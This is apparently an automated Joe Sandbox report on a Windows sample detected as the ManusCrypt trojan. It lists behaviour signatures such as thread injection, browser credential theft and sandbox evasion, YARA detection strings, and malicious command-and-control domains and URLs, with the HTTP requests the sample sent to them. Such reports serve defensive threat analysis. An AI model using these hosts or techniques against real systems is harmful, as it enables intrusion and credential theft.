Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:700949
MD5:338057ba65f786f4238be340d64daf08
SHA1:6571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256:bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
Tags:exe
Infos:

Detection

ManusCrypt
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected ManusCrypt
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Creates processes via WMI
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Installs new ROOT certificates
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Queries disk information (often used to detect virtual machines)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • file.exe (PID: 736 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 338057BA65F786F4238BE340D64DAF08)
    • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\file.exe" -h MD5: 338057BA65F786F4238BE340D64DAF08)
      • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rundll32.exe (PID: 4636 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4628 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 4776 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • svchost.exe (PID: 5440 cmdline: C:\Windows\system32\svchost.exe -k WspService MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 368 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2112 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2372 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1148 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2564 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1080 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3460 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1492 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1924 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1364 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 3584 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 1204 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2232 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt MD5: 32569E403279B3FD2EDB7EBD036273FA)
        • WMIADAP.exe (PID: 5592 cmdline: wmiadap.exe /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA)
      • svchost.exe (PID: 4488 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 2280 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
    00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmpWindows_Trojan_Generic_a681f24aunknownunknown
    • 0x576f0:$a: _kasssperskdy
    • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
    00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
    • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
    00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
      Click to see the 244 entries
      SourceRuleDescriptionAuthorStrings
      20.0.svchost.exe.2468b5b0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
      • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
      20.0.svchost.exe.2468b5b0000.0.unpackJoeSecurity_ManusCryptYara detected ManusCryptJoe Security
        20.0.svchost.exe.2468b5b0000.0.unpackMALWARE_Win_ChebkaDetects ChebkaditekSHen
        • 0x58c08:$s1: -k netsvcs
        • 0x583c8:$s3: Mozilla/4.0 (compatible)
        • 0x576f0:$s4: _kasssperskdy
        • 0x56d88:$s5: winssyslog
        • 0x58950:$s6: LoaderDll%d
        • 0x56c60:$s7: cmd.exe /c rundll32.exe shell32.dll,
        • 0x56890:$s8: cmd.exe /c start chrome.exe
        • 0x569f0:$s8: cmd.exe /c start msedge.exe
        • 0x56bd0:$s8: cmd.exe /c start firefox.exe
        • 0x66ef0:$f1: .?AVCHVncManager@@
        • 0x672d8:$f2: .?AVCNetstatManager@@
        • 0x67348:$f3: .?AVCTcpAgentListener@@
        • 0x671c8:$f4: .?AVIUdpClientListener@@
        • 0x67578:$f5: .?AVCShellManager@@
        • 0x67528:$f6: .?AVCScreenSpy@@
        20.0.svchost.exe.2468b5b0000.0.unpackWindows_Trojan_Generic_a681f24aunknownunknown
        • 0x576f0:$a: _kasssperskdy
        • 0x5861e:$c: {SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
        25.0.svchost.exe.195990b0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
        • 0x6506e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
        Click to see the 312 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://v.xyzgamev.com/911.htmlAvira URL Cloud: Label: malware
        Source: https://v.xyzgamev.com/logo.pngAvira URL Cloud: Label: malware
        Source: http://35.236.159.79/win.pacAutoConfigURLSOFTWAREAvira URL Cloud: Label: malware
        Source: http://35.236.159.79/win.pacAvira URL Cloud: Label: malware
        Source: v.xyzgamev.comVirustotal: Detection: 11%Perma Link
        Source: https://v.xyzgamev.com/911.htmlVirustotal: Detection: 15%Perma Link
        Source: http://35.236.159.79/win.pacAutoConfigURLSOFTWAREVirustotal: Detection: 12%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\db.dllReversingLabs: Detection: 65%
        Source: 19.2.svchost.exe.1b6d6000000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 27.2.svchost.exe.236f3940000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 30.2.svchost.exe.1e554740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 9.2.svchost.exe.244fc400000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 11.0.svchost.exe.2d6cb270000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 18.2.svchost.exe.1f97f120000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 22.2.svchost.exe.25139800000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 25.2.svchost.exe.195990b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 23.2.svchost.exe.226f8d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 20.0.svchost.exe.2468b5b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 25.0.svchost.exe.195990b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 7.2.svchost.exe.22baf530000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 18.0.svchost.exe.1f97f120000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 11.2.svchost.exe.2d6cb270000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 17.2.svchost.exe.1dbfc920000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 7.0.svchost.exe.22baf530000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 33.2.svchost.exe.23e495b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 23.0.svchost.exe.226f8d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 37.2.svchost.exe.12dbc510000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 19.0.svchost.exe.1b6d6000000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 29.2.svchost.exe.1f1ed200000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 28.0.svchost.exe.24e72070000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 35.2.svchost.exe.28291080000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 36.2.svchost.exe.151abe70000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 29.0.svchost.exe.1f1ed200000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 37.0.svchost.exe.12dbc510000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 30.0.svchost.exe.1e554740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 35.0.svchost.exe.28291080000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 22.0.svchost.exe.25139800000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 33.0.svchost.exe.23e495b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 5.2.rundll32.exe.4630000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 17.0.svchost.exe.1dbfc920000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 32.2.svchost.exe.1af63d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 28.2.svchost.exe.24e72070000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 27.0.svchost.exe.236f3940000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 36.0.svchost.exe.151abe70000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 20.2.svchost.exe.2468b5b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: 32.0.svchost.exe.1af63d40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.3:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49725 version: TLS 1.2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046445C0 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,5_2_046445C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04634C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,5_2_04634C20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04634E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_04634E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046356D0 FindFirstFileW,FindClose,5_2_046356D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046357F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,5_2_046357F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04636A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,5_2_04636A40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046342B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,5_2_046342B0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5363F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,7_2_0000022BAF5363F0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF534AE3 FindFirstFileW,FindClose,7_2_0000022BAF534AE3
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF534B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF534B90
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF537A30 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,7_2_0000022BAF537A30
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5349FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF5349FF
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5706D8 FindFirstFileExA,7_2_0000022BAF5706D8
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5357B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_0000022BAF5357B0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54AE20 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,7_2_0000022BAF54AE20
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF535E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Xinvalid_argument,std::_Xinvalid_argument,7_2_0000022BAF535E30

        Networking

        barindex
        Source: C:\Windows\System32\svchost.exeDomain query: g.agametog.com
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 1590Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 250Connection: Keep-AliveCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 104.21.34.132 104.21.34.132
        Source: svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pac
        Source: svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://35.236.159.79/win.pacAutoConfigURLSOFTWARE
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.289708196.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533761701.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303708302.000002D6CB064000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp.
        Source: svchost.exe, 00000013.00000000.318145699.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.790922595.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.322130353.000001B6D541F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/P
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///live.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///windows.net
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https:///xboxlive.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000021.00000002.793587070.0000023E488C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.581835295.0000023E488C2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.585221093.0000023E488C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.comd
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/2DF7
        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net1002
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net12DF7
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.netory
        Source: svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p-api.com/json/?fields=8198
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.809326059.00000244FE375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.php
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpCH
        Source: svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpSTEM
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pp.abcgameabc.com/api4.phpy
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/accounts/edit/
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com-969C-B95DBF145D3D.local
        Source: svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com2
        Source: unknownDNS traffic detected: queries for: v.xyzgamev.com
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464F540 recv,recv,SetLastError,GetLastError,WSAGetLastError,5_2_0464F540
        Source: global trafficHTTP traffic detected: GET /911.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
